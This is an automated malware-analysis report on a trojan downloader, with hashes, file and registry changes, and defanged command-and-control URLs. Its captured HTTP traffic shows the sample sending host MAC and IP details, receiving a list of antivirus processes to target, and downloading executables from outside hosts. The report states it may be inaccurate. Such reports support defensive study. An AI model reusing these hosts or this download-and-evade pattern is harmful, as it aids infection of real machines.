Gen.Variant.Application.Downloader.Nezchi.1_ebe2b9b81a

by malwarelabrobot on August 5th, 2017 in Malware Descriptions.

Gen:Variant.Application.Downloader.Nezchi.1 (AdAware), Trojan.Win32.FlyStudio.FD, Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR, GenericEmailWorm.YR, TrojanFlyStudio.YR (Lavasoft MAS)
Behaviour: Trojan, Worm, EmailWorm


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: ebe2b9b81a906ea9eb1f48e9f63f9a70
SHA1: 1afeb84a033ac1b742c0a3ac9fa1376c622db88c
SHA256: 0ede1721b55bd4f9079b2e0d551463a9da7612079220650590aa894ed6a61ed0
SSDeep: 12288:3umw/LBRj5WB/yw3LWBAp 1frbYDgKt8 kws8LY/G4dde: m0zmFLW11wDg AwsOY 4dde
Size: 549063 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: PackerUPXCompresorGratuitowwwupxsourceforgenet, UPolyXv05_v6
Company: no certificate found
Created at: 2017-07-04 15:11:33
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

Behaviour Description
EmailWorm Worm can send e-mails.


Process activity

The Trojan creates the following process(es):
No processes have been created.
The Trojan injects its code into the following process(es):

%original file name%.exe:3676
H~Yset.exe:2944

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:3676 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\H~Yset.exe (190217 bytes)

The process H~Yset.exe:2944 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\7B86.tmp (5873 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\ic[1].htm (219 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\7BA7.tmp (1425 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\7B57.tmp (7971 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\7B86.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\7BA7.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\7B57.tmp (0 bytes)

Registry activity

The process %original file name%.exe:3676 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\ebe2b9b81a906ea9eb1f48e9f63f9a70_RASAPI32]
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Direct3D\MostRecentApplication]
"Name" = "%original file name%.exe"

[HKLM\SOFTWARE\Microsoft\Tracing\ebe2b9b81a906ea9eb1f48e9f63f9a70_RASAPI32]
"EnableConsoleTracing" = "0"
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
"FileTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"

The process H~Yset.exe:2944 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\H~Yset_RASMANCS]
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\H~Yset_RASMANCS]
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\H~Yset_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3E 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\H~Yset_RASAPI32]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\H~Yset_RASMANCS]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\H~Yset_RASAPI32]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\H~Yset_RASMANCS]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\H~Yset_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\H~Yset_RASMANCS]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\H~Yset_RASAPI32]
"FileTracingMask" = "4294901760"
"ConsoleTracingMask" = "4294901760"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

Dropped PE files

MD5 File path
6fc6b0b5248b8307ff5fc7af691eedfe c:\Users\"%CurrentUserName%"\AppData\Local\Temp\H~Yset.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name:
Product Name: YDler.exe
Product Version: 2.1.0.704
Legal Copyright: Copyright (C) 2017
Legal Trademarks:
Original Filename: YDler.exe
Internal Name: YDler.exe
File Version: 2.1.0.704
File Description: ?????
Comments:
Language: Russian (Russia)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
UPX0 4096 774144 0 0 d41d8cd98f00b204e9800998ecf8427e
UPX1 778240 507904 507904 5.49544 88f4de0f17c5de22e7249c097e411190
.rsrc 1286144 28672 25600 2.79634 3a6bb189fa9bbb5f93de64e0a4504cc3

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 5
2b7d39c720cfffa054e358c662511dd0
4488300a73e94e2cc9480ecb161bd347
fb25c306065fcadb917e27e044bb8a8b
e1af98f5c9766ced31e88504f4358bc9
c0804eec03e3275eb1d14907c5372892

URLs

URL IP
hxxp://rj.58levo.com/api.php 222.186.161.27
hxxp://api.baizhu.cc/api/getlist 120.26.109.229
hxxp://api.baizhu.cc/api/getinfo 120.26.109.229
hxxp://down.qhcdn.com/360/inst.exe
hxxp://123.206.109.96/o/icc.html
hxxp://cdn.baizhu.cc.w.kunlunpi.com/baizhu.zip 124.47.11.89
hxxp://rj.58levo.com/upgrape.php 222.186.161.27
hxxp://1212.ip138.com/ic.asp 183.238.101.232
hxxp://113.17.184.163/love/cpa06.asp?mac=00:50:56:3B:AE:AC&os=Windows 7&ip=194.242.96.218&dz=316332277313300274
hxxp://down.360safe.com/360/inst.exe
hxxp://113.17.184.163/love/cpa06.asp?mac=00:50:56:3B:AE:AC&os=Windows 7&ip=194.242.96.218&dz=......


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET MALWARE Possible Windows executable sent when remote host claims to send html content
ET POLICY PE EXE or DLL Windows file download HTTP
ET POLICY Unsupported/Fake Windows NT Version 5.0
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile

Traffic

GET /ic.asp HTTP/1.1
Accept: */*
Referer: hXXp://1212.ip138.com/ic.asp
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: 1212.ip138.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Fri, 04 Aug 2017 17:49:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 219
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCABBADSQ=IKCGGGECIEMCDGBMMNLKMCNJ; path=/
Cache-control: private
<html>..<head>..<meta http-equiv="content-type" content
="text/html; charset=gb2312">..<title> ....IP.... </title&
gt;..</head>..<body style="margin:0px"><center>....I
P....[194.242.96.218] ............</center></body></htm
l>HTTP/1.1 200 OK..Date: Fri, 04 Aug 2017 17:49:17 GMT..Server: Mic
rosoft-IIS/6.0..X-Powered-By: ASP.NET..Content-Length: 219..Content-Ty
pe: text/html..Set-Cookie: ASPSESSIONIDCABBADSQ=IKCGGGECIEMCDGBMMNLKMC
NJ; path=/..Cache-control: private..<html>..<head>..<me
ta http-equiv="content-type" content="text/html; charset=gb2312">..
<title> ....IP.... </title>..</head>..<body style
="margin:0px"><center>....IP....[194.242.96.218] ............
</center></body></html>..



POST /api/getinfo HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW32; Trident/5.0)
Content-Length: 194
Host: api.baizhu.cc

js={"appid":"1","getlist":{"inslog":"","proc":null,"reg":null},"id":1033,"mac":"00-50-56-3B-AE-AC","md5":"EBE2B9B81A906EA9EB1F48E9F63F9A70","rgn":"","sid":"360","st":0,"ver":"2.1.0.704","zn":2

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 04 Aug 2017 17:49:06 GMT
Content-Type: text/html;Charset=utf-8;charset=UTF-8
Connection: close
Vary: Accept-Encoding
{"close":true,"loading":true,"XLDOWN":200000000,"charset":"utf-8","xlu
rl":"http:\/\/cdn.baizhu.cc\/exe1\/ThunderSpeed1.0.35.366.exe","smallr
ange":0,"ip":"194.242.96.218","color":0,"ClearV":false,"logo":"http:\/
\/cdn.baizhu.cc\/baizhu.zip","mainres":"","mainres2":"","tempdir":"gzs
s","setres":"http:\/\/cdn.baizhu.cc\/exe\/skin-lao0516.zip","linkname"
:"\u7f51\u5740\u5bfc\u822a,\u7f51\u5740\u5927\u5168,\u4e0a\u7f51\u9996
\u9009","exthistory":{"mime":"","name":"qyhelper.dll","url":"http:\/\/
cdn.baizhu.cc\/dll\/qyhelper.dll","param":"bd_8501","type":2},"favo":[
],"favo1":[],"dq":[],"link":[{"url":"http:\/\/hao.360.cn\/?src=lm&ls=n
36a7f6a197","id":0},{"url":"http:\/\/hao.360.cn\/?src=lm&ls=n36a7f6a19
7","id":1},{"url":"http:\/\/hao.360.cn\/?src=lm&ls=n36a7f6a197","id":2
},{"url":"http:\/\/hao.360.cn\/?src=lm&ls=n36a7f6a197","id":3},{"url":
"","id":4},{"url":"http:\/\/hao.360.cn\/?src=lm&ls=n36a7f6a197","id":5
},{"url":"http:\/\/hao.360.cn\/?src=lm&ls=n36a7f6a197","id":6},{"url":
"http:\/\/hao.360.cn\/?src=lm&ls=n36a7f6a197","id":7},{"url":"","id":8
},{"url":"http:\/\/hao.360.cn\/?src=lm&ls=n36a7f6a197","id":9},{"url":
"http:\/\/jinmeo.xrbbn.com","id":10},{"url":"https:\/\/VVV.baidu.com\/
link?url=6ts7NuJosrL9wM2NoBWnl7WxAkg_nLna7z2SQfIeSKiRGiAj3lMSVu1b3x3dN
oYf","id":11},{"url":"http:\/\/hao.360.cn\/?src=lm&ls=n36a7f6a197","id
":12},{"url":"http:\/\/hao.360.cn\/?src=lm&ls=n36a7f6a197","id":13},{"
url":"http:\/\/hao.360.cn\/?src=lm&ls=n36a7f6a197","id":14},{"url":"ht
tp:\/\/hao.360.cn\/?src=lm&ls=n36a7f6a197","id":15},{"url":"http:\
<<< skipped >>>


POST /api/getlist HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW32; Trident/5.0)
Content-Length: 147
Host: api.baizhu.cc

js={"appid":"1","id":1033,"mac":"00-50-56-3B-AE-AC","md5":"EBE2B9B81A906EA9EB1F48E9F63F9A70","rgn":"","sid":"360","st":0,"ver":"2.1.0.704","zn":2

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 04 Aug 2017 17:49:04 GMT
Content-Type: text/html;Charset=utf-8;charset=UTF-8
Connection: close
Vary: Accept-Encoding
{"proc":[{"id":"1","proc":"360tray.exe","status":"1"},{"id":"2","proc"
:"360sd.exe","status":"1"},{"id":"3","proc":"zhudongfangyu.exe","statu
s":"1"},{"id":"4","proc":"QQPCRTP.exe","status":"1"},{"id":"5","proc":
"kxescore.exe","status":"1"},{"id":"6","proc":"kxetray.exe","status":"
1"},{"id":"7","proc":"BaiduAnTray.exe","status":"1"},{"id":"8","proc":
"BaiduSdTray.exe","status":"1"},{"id":"9","proc":"wxclient.exe","statu
s":"1"},{"id":"10","proc":"BarChargesView.exe","status":"1"},{"id":"11
","proc":"2345SafeTray.exe","status":"1"},{"id":"12","proc":"M11SASCui
L.exe","status":"1"},{"id":"13","proc":"MsMpEng.exe","status":"1"},{"i
d":"14","proc":"MpCmdRun.exe","status":"1"},{"id":"15","proc":"MSASCui
L.exe","status":"1"}],"reg":[{"id":86,"type":2,"path":"SOFTWARE\\Micro
soft\\Windows\\CurrentVersion\\Uninstall\\\u6d77\u6dd81\u53f7","name":
"DisplayIcon","wow64":1},{"id":87,"type":2,"path":"SOFTWARE\\Microsoft
\\Windows\\CurrentVersion\\Uninstall\\\u5947\u4e50\u6e38\u620f\u76d2",
"name":"UninstallString","wow64":1},{"id":89,"type":3,"path":"SOFTWARE
\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{DF48EBD2-24BD-4f52-9
D31-2AEBAC8133B0}","name":"UninstallString","wow64":1},{"id":90,"type"
:3,"path":"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\QQ
\u6e38\u620f","name":"UninstallString","wow64":1},{"id":91,"type":3,"p
ath":"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\\u6e38\
u65cf\u76d7\u5893\u7b14\u8bb0","name":"UninstallString","wow64":1},{"i
d":92,"type":3,"path":"SOFTWARE\\Microsoft\\Windows\\CurrentVersio
<<< skipped >>>


POST /api.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Content-Length: 46
Host: rj.58levo.com

dt=..\WOPG...\RSG..\QQLTQLTWLR#L $L "G.....\X
HTTP/1.1 200 OK
Date: Fri, 04 Aug 2017 17:49:01 GMT
Server: Apache/2.2.31 (Unix) mod_ssl/2.2.31 OpenSSL/1.0.1e-fips PHP/5.5.27
X-Powered-By: PHP/5.5.27
Content-Length: 66
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
....XMMSPQLPRTLSR[L[TM.M...L......T$!T R WPVZ ZQRU$$W$!U#$T[S''&$'HTTP
/1.1 200 OK..Date: Fri, 04 Aug 2017 17:49:01 GMT..Server: Apache/2.2.3
1 (Unix) mod_ssl/2.2.31 OpenSSL/1.0.1e-fips PHP/5.5.27..X-Powered-By: 
PHP/5.5.27..Content-Length: 66..Keep-Alive: timeout=5, max=100..Connec
tion: Keep-Alive..Content-Type: text/html..X-Pad: avoid browser bug...
...XMMSPQLPRTLSR[L[TM.M...L......T$!T R WPVZ ZQRU$$W$!U#$T[S''&$'..



HEAD /o/icc.html HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: 123.206.109.96


HTTP/1.1 200 OK
Server: NetBox Version 2.8 Build 4128
Date: Fri, 04 Aug 2017 17:49:13 GMT
Connection: Keep-Alive
Content-Type: text/html
Last-Modified: Sun, 28 Jul 2017 10:44:40 GMT
Content-Length: 384512
....


GET /o/icc.html HTTP/1.1


Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: 123.206.109.96


HTTP/1.1 200 OK
Server: NetBox Version 2.8 Build 4128
Date: Fri, 04 Aug 2017 17:49:14 GMT
Connection: Keep-Alive
Content-Type: text/html
Last-Modified: Sun, 28 Jul 2017 10:44:40 GMT
Content-Length: 384512
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$........M..@,..@,..
@,..;0..E,../3..I,../3..F,...0..l,..v....,..v....,...3..l,.."3..\,..@,
.......$..C,...3..(,...3..[,..@,...,...*..A,..Rich@,..................
PE..L.....yY.................@...`...............P....@...............
...................................................................P..
XW....................................................................
.......................................text....@......................
....`....rdata...`...P...j..................@....data............Z...B
..............@....rsrc....`...P......................@....aspack..0..
.....$..................`....adata..............................@.....
......................................................................
......................................................................
......................................................................
............................................ .D:.... ..I..tV-Z...j...b
..6. .>..d.c..7k....!....H.@...^..._M...@....d.F..V../.Z6..!...x.i.
....E...o..\..K;{...^t..v.Z.....YP....!.3..n.E0....&i....a.M.%L<..H
...r.!...P....q.gr.......|.~.......s~..........-..I...L}!QW[...[V.....
zcP.......s.... .`~7....`@..7.*^....k.EW...se.7...p..L..1..`Y.\..._...
.4......c....e.F.M\...".?.c..9\_..$...?[.G.... .~....{>l..CmC.:..m.
..;..8...b@...V9......j.:.(.........._hR..%.9...X.M&...~.......(%.....
E.bW. ....o.*...:....T.#...GiX.-......]....]...N...K.=......{...|.
<<< skipped >>>


GET /love/cpa06.asp?mac=00:50:56:3B:AE:AC&os=Windows 7&ip=194.242.96.218&dz=...... HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: 113.17.184.163
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: NetBox Version 2.8 Build 4128
Date: Fri, 04 Aug 2017 17:49:10 GMT
Connection: Keep-Alive
Set-Cookie: ADSMBCFGLOLRZIGWEGAU=YDGEJFFLCEBCJTJQOGPHWKWFVBXUAZZYADALBGCA; path=/
Cache-control: private
Content-Type: text/html
Expires: Fri, 04 Aug 2017 17:49:10 GMT
Content-Length: 0
HTTP/1.1 200 OK..Server: NetBox Version 2.8 Build 4128..Date: Fri, 04 
Aug 2017 17:49:10 GMT..Connection: Keep-Alive..Set-Cookie: ADSMBCFGLOL
RZIGWEGAU=YDGEJFFLCEBCJTJQOGPHWKWFVBXUAZZYADALBGCA; path=/..Cache-cont
rol: private..Content-Type: text/html..Expires: Fri, 04 Aug 2017 17:49
:10 GMT..Content-Length: 0..



POST /upgrape.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Content-Length: 4
Host: rj.58levo.com

dt=2
HTTP/1.1 200 OK
Date: Fri, 04 Aug 2017 17:49:34 GMT
Server: Apache/2.2.31 (Unix) mod_ssl/2.2.31 OpenSSL/1.0.1e-fips PHP/5.5.27
X-Powered-By: PHP/5.5.27
Content-Length: 4
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
trueHTTP/1.1 200 OK..Date: Fri, 04 Aug 2017 17:49:34 GMT..Server: Apac
he/2.2.31 (Unix) mod_ssl/2.2.31 OpenSSL/1.0.1e-fips PHP/5.5.27..X-Powe
red-By: PHP/5.5.27..Content-Length: 4..Keep-Alive: timeout=5, max=100.
.Connection: Keep-Alive..Content-Type: text/html..X-Pad: avoid browser
 bug..true..



GET /360/inst.exe HTTP/1.1
Host: down.360safe.com
Accept:*/*
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Connection:close
Cache-Control: no-cache
Cookie:


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 04 Aug 2017 17:49:08 GMT
Content-Type: application/octet-stream
Content-Length: 1627048
Last-Modified: Fri, 13 Jan 2017 02:30:15 GMT
Connection: close
Expires: Sat, 05 Aug 2017 01:49:08 GMT
Cache-Control: max-age=28800
Accept-Ranges: bytes
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$........F...'...'..
.'..>h7..'..._4..'..._(..'...u%..'.......'.......'...'...&..._%..'.
.._".&'...u5..'..._0..'..Rich.'..........................PE..L...Z..W.
...........................T!............@............................
...........@..................................(..|.......H............
....5.......g...................................~..@...............<
;............................text...$........................... ..`.r
data...Z.......\..................@..@.data...p....P...j...4..........
....@....rsrc...H...........................@..@.reloc...q.......r...*
..............@..B....................................................
......................................................................
......................................................................
......................................................................
........................................................I.3..D$.SU.l$ 
V...t$.....N....tX3.......9t$.v3.D$.P.......P.......t4.....f9L$.u.....
......F;t$.r......^][.L$.3...........L$.^][3.3........................
...V.D$.P.L$.Q3.S...D$......D$......t$...O.......tsf.|$.........;olWc.
...........=82b..|...............@f9...pH.t.Ff...r......^....f...sN.D$
..L$.........L$....u....v.3.^...........D$.........................t..
..........^.....................W..x...;9v.3._...x....>..P.).......
.
<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

%original file name%.exe_3676:

`.rsrc
hu.cf
D$(Xj
D$0XY
SSSSh
hh h!"hh#$hhhh%&'hhh(h)*h hhh,-.hh/0123hhhh4h5hhhhhhh6hhhhhh789:;<hhhhhhhh=hhh>?@ABCDEhhhhFhhhhGHhhhhhIhJKLhhhhhMNhhhOOhhPhhhhhhhhhQhhRhSTUVWhXhhhhhhYZ[h\hh]^_hh`hahhbhcdhhefg
11111111111111111
>%ufj
8%u*@Sj%
t.Gj:W
j.Yf;
_tcPVj@
r%f;M
.PjRW
inflate 1.1.3 Copyright 1995-1998 Mark Adler
Connection #%ld to host %s left intact
Pipe broke: handle %p, url = %s
In state %d with no easy_conn, bail out!
Operation timed out after %ld milliseconds with %I64d out of %I64d bytes received
Operation timed out after %ld milliseconds with %I64d bytes received
Hostname '%s' was found in DNS cache
Internal error removing splay node = %d
Internal error clearing splay node = %d
ignoring failed cookie_init for %s
23[^;
=] =I99[^;
httponly
skipped cookie with bad tailmatch domain: %s
#HttpOnly_
%s cookie %s="%s" for domain %s, path %s, expire %I64d
%s%s%s
# Netscape HTTP Cookie File
# hXXps://curl.haxx.se/docs/http-cookies.html
# This file was generated by libcurl! Edit at your own risk.
# Fatal libcurl error
WARNING: failed to save cookies in %s
security.dll
secur32.dll
.Aproxy
Could not resolve %s: %s
init_resolve_thread() failed for %s; %s
getaddrinfo() failed for %s:%d; %s
Hostname %s was found in DNS cache
%5[^:]:%d
Couldn't parse CURLOPT_RESOLVE removal entry '%s'!
%5[^:]:%d:%5s
Couldn't parse CURLOPT_RESOLVE entry '%s'!
Address in '%s' found illegal!
Added %s:%d:%s to DNS cache
Unrecognized parameter value passed via CURLOPT_SSLVERSION
CURLOPT_SSL_VERIFYHOST no longer supports 1 as value!
can pipeline
Found bundle for host %s: %p [%s]
Server doesn't support multi-use yet, wait
Server doesn't support multi-use (yet)
Could pipeline, but not asked to!
Pipe is full, skip (%zu)
Multiplexed connection found!
Found pending candidate for reuse and CURLOPT_PIPEWAIT is set
Connected to %s (%s) port %ld (#%ld)
IDN support not present, can't parse Unicode domains
Protocol "%s" not supported or disabled in libcurl
Illegal characters found in URL
Bad URL, colon is first character
Bad URL
127.0.0.1/
Invalid file://hostname/, expected localhost or 127.0.0.1 or none
/:]:%3[/]%[^
<url> malformed
SMTP.
smtp
Unwillingly accepted illegal URL using %d slash%s!
%s://%s%s
Rebuilt URL to: %s
Please URL encode %% as %%, see RFC 6874.
http_proxy
https
http:
Unsupported proxy scheme for '%s'
Unsupported proxy '%s', libcurl is built without the HTTPS-proxy support.
No valid port number in proxy string (%s)
[%*45[0123456789abcdefABCDEF:.]%c
;type=%c
%s://%s%s%s:%hu%s%s%s
Port number out of range
Illegal port number
Couldn't find host %s in the _netrc file; using defaults
PTF@example.com
No valid port number in connect to host string (%s)
Connecting to hostname: %s
Connecting to port: %d
Couldn't resolve host '%s'
Couldn't resolve proxy '%s'
%s://%s
Found connection %ld, with requests in the pipe (%zu)
Re-using existing connection! (#%ld) with %s %s
No more connections allowed to host: %d
User-Agent: %s
Send failure: %s
Recv failure: %s
Write callback asked for PAUSE when not supported!
[%s %s %s]
Failed to set SO_KEEPALIVE on fd %d
Failed to set SIO_KEEPALIVE_VALS on fd %d: %d
Couldn't bind to interface '%s'
Local Interface %s is ip %s using address family %i
Name '%s' family %i resolved to '%s' family %i
Couldn't bind to '%s'
getsockname() failed with errno %d: %s
Local port: %hu
Bind to local port %hu failed, trying next
bind failed with errno %d: %s
getpeername() failed with errno %d: %s
ssrem inet_ntop() failed with errno %d: %s
ssloc inet_ntop() failed with errno %d: %s
connect to %s port %ld failed: %s
Failed to connect to %s port %ld: %s
Could not set TCP_NODELAY: %s
TCP_NODELAY set
sa_addr inet_ntop() failed with errno %d: %s
Trying %s...
Immediate connect fail for %s: %s
ftps
smtps
tftp
7.53.1
libcurl/7.53.1
operation aborted by callback
Read callback asked for PAUSE when not supported!
seek callback returned error %d
the ioctl callback returned %d
ioctl callback returned error %d
Rewinding stream by : %zd bytes on url %s (zero-length body)
Excess found in a non pipelined read: excess = %zd url = %s (zero-length body)
HTTP server doesn't seem to support byte ranges. Cannot resume.
Simulate a HTTP 304 response!
%s in chunked-encoding
Rewinding stream by : %zu bytes on url %s (size = %I64d, maxdownload = %I64d, bytecount = %I64d, nread = %zd)
Excess found in a non pipelined read: excess = %zu, size = %I64d, maxdownload = %I64d, bytecount = %I64d
No URL set!
%%x
[^?&/:]://%c
Issue another request to this URL: '%s'
Disables POST, goes with %s
HTTPS
%s:%s
%sAuthorization: Basic %s
The requested URL returned error: %d
%s auth using %s with user '%s'
%s, d %s M d:d:d GMT
If-Modified-Since: %s
If-Unmodified-Since: %s
Last-Modified: %s
Referer: %s
Accept-Encoding: %s
Chunky upload is not supported by HTTP 1.0
Host: %s%s%s
Host: %s%s%s:%hu
PTF://
Range: bytes=%s
Content-Range: bytes %s%I64d/%I64d
Content-Range: bytes %s/%I64d
PTF://%s:%s@%s
%s HTTP/%s
%s%s%s%s%s%s%s%s%s%s%s
%s%s=%s
Internal HTTP POST error!
Content-Type: application/x-www-form-urlencoded
Failed sending HTTP POST request
Failed sending HTTP request
HTTP/
Avoided giant realloc for header (max is %d)!
The requested URL returned error: %s
Connection closure while negotiating auth (HTTP 1.0?)
HTTP error before end of send, keep sending
HTTP error before end of send, stop sending
HTTP/%d.%d %d
HTTP/2 %d
Lying server, not serving HTTP/2
HTTP =
RTSP/%d.%d =
HTTP 1.0, assume close after body
HTTP/1.0 proxy connection set to keep alive!
HTTP/1.1 proxy connection set close!
HTTP/1.0 connection set to keep alive!
%s:%ld
--:--:--
%3I64d %s %3I64d %s %3I64d %s %s %s %s %s %s %s
@Operation too slow. Less than %ld bytes/sec transferred the last %ld seconds
Conn: %ld (%p) Receive pipe weight: (%I64d/%zu), penalized: %s
Site %s:%d is pipeline blacklisted
Server %s is blacklisted
d:d:d%n
d:d%n
0123456789
Unsupported protocol
URL using bad/illegal format or missing URL
A requested feature, protocol or option was not found built-in in this libcurl due to a build-time decision.
FTP: The server failed to connect to data port
FTP: Accepting server connect has timed out
FTP: The server did not accept the PRET command.
FTP: unknown PASS reply
FTP: unknown PASV reply
FTP: unknown 227 response format
FTP: can't figure out the host in the PASV response
Error in the HTTP2 framing layer
FTP: couldn't set file type
FTP: couldn't retrieve (RETR failed) the specified file
HTTP response code said error
FTP: command PORT failed
FTP: command REST failed
Operation was aborted by an application callback
A libcurl function was given a bad argument
An unknown option was passed in to libcurl
SSL peer certificate or SSH remote key was not OK
Problem with the local SSL certificate
Peer certificate cannot be authenticated with given CA certificates
Problem with the SSL CA cert (path? access rights?)
Unrecognized or bad HTTP Content or Transfer-Encoding
Invalid LDAP URL
Issuer check against peer certificate failed
Login denied
TFTP: File Not Found
TFTP: Access Violation
TFTP: Illegal operation
TFTP: Unknown transfer ID
TFTP: No such user
Caller must register CURLOPT_CONV_ callback options
Error in the SSH layer
Unable to parse FTP file list
SSL public key does not match pinned public key
SSL server certificate status verification FAILED
Stream error in the HTTP/2 framing layer
Protocol option is unsupported
Protocol is unsupported
Socket is unsupported
Operation not supported
Address family not supported
Protocol family not supported
Winsock version not supported
Unknown error %d (%#x)
SEC_E_CERT_EXPIRED
SEC_E_CERT_UNKNOWN
SEC_E_CERT_WRONG_USAGE
SEC_E_KDC_CERT_EXPIRED
SEC_E_KDC_CERT_REVOKED
SEC_E_NO_KERB_KEY
SEC_E_NO_S4U_PROT_SUPPORT
SEC_E_QOP_NOT_SUPPORTED
SEC_E_SMARTCARD_CERT_EXPIRED
SEC_E_SMARTCARD_CERT_REVOKED
SEC_E_STRONG_CRYPTO_NOT_SUPPORTED
SEC_E_UNSUPPORTED_FUNCTION
SEC_E_UNSUPPORTED_PREAUTH
SEC_E_ILLEGAL_MESSAGE (0xX) - This error usually occurs when a fatal SSL/TLS alert is received (e.g. handshake failed). More detail may be available in the Windows System event log.
%s (0xX)
%s - %s
schannel: SSL/TLS connection with %s port %hu (step 1/3)
schannel: incremented credential handle refcount = %d
schannel: disabled server certificate revocation checks
schannel: checking server certificate revocation
schannel: verifyhost setting prevents Schannel from comparing the supplied target name with the subject names in server certificates.
Schannel: TLS 1.3 is not yet supported
Unrecognized parameter passed via CURLOPT_SSLVERSION
schannel: SNI or certificate check failed: %s
schannel: AcquireCredentialsHandle failed: %s
schannel: using IP address, SNI is not supported by OS.
schannel: initial InitializeSecurityContext failed: %s
schannel: SSL/TLS connection with %s port %hu (step 2/3)
schannel: a client certificate has been requested
schannel: next InitializeSecurityContext failed: %s
